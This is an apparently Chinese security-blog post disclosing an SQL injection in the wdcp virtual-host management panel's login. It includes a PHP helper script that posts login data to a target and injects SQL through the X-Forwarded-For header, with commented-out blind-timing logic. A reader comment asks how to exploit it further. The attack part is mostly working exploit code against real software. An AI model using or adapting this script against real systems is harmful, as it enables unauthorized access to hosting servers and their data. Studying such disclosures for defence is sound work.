当前位置: iick's blog > 网站漏洞 > wdcp虚拟主机管理系统注入漏洞

wdcp虚拟主机管理系统注入漏洞

作者:hack1990 时间:14-05-29 阅读数:1203人阅读

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。

passwd字段存在注入风险,选择限制字符长度为30

 

image

辅助脚本

<?php 
$id=$_GET["id"]; 
//$id2=$_GET["id2"]; 
$post_data = ''username=admin&passwd=bbbbbb\&Submit_login=aaaassss''; 
  $url=''http://0day5.com:8080/''; 
  $starttime = time(); 
  $ch = curl_init(); 
  curl_setopt($ch, CURLOPT_POST, 1); 
  curl_setopt($ch, CURLOPT_URL,$url); 
    //curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
  curl_setopt($ch, CURLOPT_HTTPHEADER, array(''X-FORWARDED-FOR: ,(''.$id.''),char(65),1) #''));   
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); 
  ob_start(); 
  curl_exec($ch); 
  $result = ob_get_contents() ; 
  ob_end_clean(); 
  $endtime = time(); 
/* 
if($endtime-$starttime>=3){ 
 
  exit($id." is ".chr($id2)); 
}*/
echo $result; 
?>  

image

# Nmap Security Scanner 7.0

上一篇:Openfire 3.8.2 server 添加管理员漏洞

下一篇:FoosunCms的asp版本取shell漏洞

相关文章

评论列表

  •  
    发布于 2014-06-07 20:15:45  回复
  • 报错之后怎么利用啊- -
    脚本执行无回显

发表评论